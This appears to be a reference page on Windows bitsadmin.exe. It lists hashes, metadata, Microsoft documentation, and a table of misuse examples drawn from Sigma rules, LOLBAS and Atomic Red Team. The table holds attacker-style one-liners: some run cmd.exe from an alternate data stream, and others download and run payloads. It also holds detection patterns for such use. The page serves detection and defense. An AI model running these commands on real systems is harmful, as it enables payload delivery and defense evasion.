bitsadmin.exe

  • File Path: C:\windows\system32\bitsadmin.exe
  • Description: BITS administration utility

Hashes

| Type | Hash |
| --- | --- |
| MD5 | 707D3D8A2A2F1B8923C383AEF6370AF7 |
| SHA1 | E48D8F65375D067E2903C928C4388DBFCFABBDD3 |
| SHA256 | 8F3F9E882E4DB13860AE240D6F988D39B641B2AE50F21462BA320993445EEBB8 |
| SHA384 | 2CDE4F144325C9108299D8403633AEA8D3DFFEF863BE01F3036F1E152F0B5FD449830F8CF4701F21B6082B2A1227A6B1 |
| SHA512 | B5EAFEC362576C804D7B194BB85067DAAFD6294A373FBE009A5D49D473A84584E9082FBB44708A8C9530EE4CD6DF6A14D070803BC5401BFC85A8EDBB414889C7 |
| SSDEEP | 3072:Z/+YmZndZetIq4QJkSejZ1pMXMCSDw1wpbDORVjW1Xy72WbrODud5q0oSu/2PUG:otQJkSe/kQKobDORVj48g/2 |

Signature

  • Status: The file C:\windows\system32\bitsadmin.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial:
  • Thumbprint:
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: bitsadmin.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 7.7.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 7.7.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of bitsadmin.exe being misused. While bitsadmin.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

| Source | Source File | Example | License |
| --- | --- | --- | --- |
| sigma | proxy_ua_bitsadmin_susp_tld.yml | title: Bitsadmin to Uncommon TLD | DRL 1.0 |
| sigma | proxy_ua_bitsadmin_susp_tld.yml | description: Detects Bitsadmin connections to domains with uncommon TLDs - https://twitter.com/jhencinski/status/1102695118455349248 - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/ | DRL 1.0 |
| sigma | proxy_ua_bitsadmin_susp_tld.yml | - Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca | DRL 1.0 |
| sigma | win_apt_greenbug_may20.yml | - 'bitsadmin /transfer' | DRL 1.0 |
| sigma | win_exploit_cve_2020_10189.yml | - '*\bitsadmin.exe' | DRL 1.0 |
| sigma | win_mmc_spawn_shell.yml | - '*\BITSADMIN*' | DRL 1.0 |
| sigma | win_mshta_spawn_shell.yml | - '*\BITSADMIN*' | DRL 1.0 |
| sigma | win_powershell_bitsjob.yml | title: Suspicious Bitsadmin Job via PowerShell | DRL 1.0 |
| sigma | win_process_creation_bitsadmin_download.yml | title: Bitsadmin Download | DRL 1.0 |
| sigma | win_process_creation_bitsadmin_download.yml | description: Detects usage of bitsadmin downloading a file | DRL 1.0 |
| sigma | win_process_creation_bitsadmin_download.yml | - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin | DRL 1.0 |
| sigma | win_process_creation_bitsadmin_download.yml | - '*\bitsadmin.exe' | DRL 1.0 |
| sigma | win_process_creation_bitsadmin_download.yml | - '*copy bitsadmin.exe*' | DRL 1.0 |
| sigma | win_shell_spawn_susp_program.yml | - '*\bitsadmin.exe' | DRL 1.0 |
| sigma | win_susp_shell_spawn_from_mssql.yml | - '*\bitsadmin.exe' | DRL 1.0 |
| sigma | win_webshell_spawn.yml | - '*\bitsadmin.exe' | DRL 1.0 |
| LOLBAS | Bitsadmin.yml | Name: Bitsadmin.exe | |
| LOLBAS | Bitsadmin.yml | - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 | |
| LOLBAS | Bitsadmin.yml | Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. | |
| LOLBAS | Bitsadmin.yml | - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 | |
| LOLBAS | Bitsadmin.yml | Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | |
| LOLBAS | Bitsadmin.yml | - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset | |
| LOLBAS | Bitsadmin.yml | - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset | |
| LOLBAS | Bitsadmin.yml | Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | |
| LOLBAS | Bitsadmin.yml | - Path: C:\Windows\System32\bitsadmin.exe | |
| LOLBAS | Bitsadmin.yml | - Path: C:\Windows\SysWOW64\bitsadmin.exe | |
| LOLBAS | Bitsadmin.yml | - IOC: Child process from bitsadmin.exe | |
| LOLBAS | Bitsadmin.yml | - IOC: bitsadmin creates new files | |
| LOLBAS | Bitsadmin.yml | - IOC: bitsadmin adds data to alternate data stream | |
| atomic-red-team | index.md | - Atomic Test #1: Bitsadmin Download (cmd) [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #9: Windows - BITSAdmin BITS Download [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #1: Bitsadmin Download (cmd) [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #9: Windows - BITSAdmin BITS Download [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | - Atomic Test #9 - Windows - BITSAdmin BITS Download | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | ## Atomic Test #9 - Windows - BITSAdmin BITS Download | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | The interface to create and manage BITS jobs is accessible through PowerShell (Citation: Microsoft BITS) and the BITSAdmin tool. (Citation: Microsoft BITSAdmin) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | - Atomic Test #1 - Bitsadmin Download (cmd) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | - Atomic Test #2 - Bitsadmin Download (PowerShell) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | ## Atomic Test #1 - Bitsadmin Download (cmd) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | This test simulates an adversary leveraging bitsadmin.exe to download | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | ## Atomic Test #2 - Bitsadmin Download (PowerShell) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer and execute a payload in multiple steps. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | bitsadmin.exe /create #{bits_job_name} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | bitsadmin.exe /resume #{bits_job_name} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | bitsadmin.exe /complete #{bits_job_name} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1560.001.md | bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1560.001.md | bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} | MIT License. © 2018 Red Canary |
| signature-base | apt_keyboys.yar | $x1 = "egsvr32.exe "/u bitsadmin /canceft\windows\currebitsadmin" ascii | CC BY-NC 4.0 |
| signature-base | gen_github_net_redteam_tools_guids.yara | reference = "https://github.com/bitsadmin/nopowershell" | CC BY-NC 4.0 |
| signature-base | gen_github_net_redteam_tools_guids.yara | reference = "https://github.com/bitsadmin/fakelogonscreen" | CC BY-NC 4.0 |
| signature-base | gen_recon_indicators.yar | $s13 = "bitsadmin /rawreturn /transfer getfile" ascii | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | reference = "https://github.com/bitsadmin/nopowershell" | CC BY-NC 4.0 |

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
bitsadmin

Applies to: Windows Server (Semi-Annual Channel), Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows 10

Bitsadmin is a command-line tool used to create, download or upload jobs, and to monitor their progress. The bitsadmin tool uses switches to identify the work to perform. You can call bitsadmin /? or bitsadmin /help to get a list of switches.

Most switches require a <job> parameter, which you set to the job’s display name, or GUID. A job’s display name doesn’t have to be unique. The /create and /list switches return a job’s GUID.

By default, you can access information about your own jobs. To access information for another user’s jobs, you must have administrator privileges. If the job was created in an elevated state, then you must run bitsadmin from an elevated window; otherwise, you’ll have read-only access to the job.

Many of the switches correspond to methods in the BITS interfaces. For additional details that may be relevant to using a switch, see the corresponding method.

Use the following switches to create a job, set and retrieve the properties of a job, and monitor the status of a job. For examples that show how to use some of these switches to perform tasks, see bitsadmin examples.

Available switches
MIT License. Copyright (c) 2020-2021 Strontic.